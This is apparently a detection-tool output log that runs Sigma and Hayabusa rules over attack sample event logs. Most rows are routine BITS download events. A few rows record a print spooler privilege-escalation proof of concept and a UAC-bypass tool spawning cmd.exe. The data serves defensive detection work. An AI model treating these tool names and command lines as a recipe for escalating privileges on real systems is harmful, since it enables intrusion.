https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component 
Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job 
Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: 
UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
